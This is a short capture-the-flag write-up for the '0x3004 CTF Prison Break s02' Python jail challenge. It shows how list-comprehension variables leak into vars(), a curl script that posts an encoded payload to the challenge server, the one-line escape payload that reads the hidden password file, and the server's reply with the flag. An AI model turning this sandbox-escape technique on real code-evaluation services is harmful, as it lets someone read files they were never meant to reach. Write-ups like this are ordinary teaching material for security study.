# 0x3004 CTF - Prison Break s02


# python
>>> list(vars())
['__builtins__', '__name__', '__doc__', '__package__']
>>> [newvar for newvar in list(vars())]
['__builtins__', '__name__', '__doc__', '__package__']
>>> [list(vars()) for newvar in [0]][0]
['__builtins__', '__name__', 'newvar', '__doc__', '__package__']

# cat pyjail.py
from sys import modules
modules.clear()
del modules

__builtins__.dir = None
eval = None
input = None
execfile = None

LEN_PASS = None
print [list(vars()) for password in [0]]
print [list(vars()).index('password') for password in [0]]

# python pyjail.py
[['LEN_PASS', '__builtins__', '__file__', 'execfile', '__package__', 'eval', 'input', '__name__', 'password', '__doc__']]
[8]

# cat prison_break_s02.sh
#!/bin/bash

function encode {
    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'
}

escape="$1"
password=`encode $escape`

curl --silent --request POST --data code=$password 'http://challenges.wargame.vn:50006/go'

# ./prison_break_s02.sh "[max(open(list(vars())[8]))for(password)in[0]][0]"
<html><title>Prison Break s02</title><style>body{background:#000;}</style><body>

    from sys import modules
    modules.clear()
    del modules

    __builtins__.dir = None
    eval = None
    input = None
    execfile = None

    LEN_PASS = len(open('./password','r').read()) # Length of Password
    
    I_N_P_U_T = ( <strong style='color:Green;'>[max(open(list(vars())[8]))for(password)in[0]][0]</strong> ) # only a-z0-9[]() and length of code must be <= 50
    
    P_A_S_S_W_O_R_D = open('./password','r').read()

    assert LEN_PASS >= 1
    assert LEN_PASS == len(I_N_P_U_T)
    for i in range(LEN_PASS):
     if I_N_P_U_T[i] != P_A_S_S_W_O_R_D[i]:
      from sys import exit
      exit()

    # FLAGGGGGGGGGGGGGGGGGGGGGGGG
    print 'Here is your flag:',open('./flag','r').read()
    -----------------------------------------------------
    
    <strong style='color:White;'>Here is your flag: 0x3004{final_stage_prison_break_1337}

</strong>
</pre></html>

References

http://blog.natusvincere.org/2014/05/03/0x3004-ctf-prison-break-s02-pwn300/

No comments: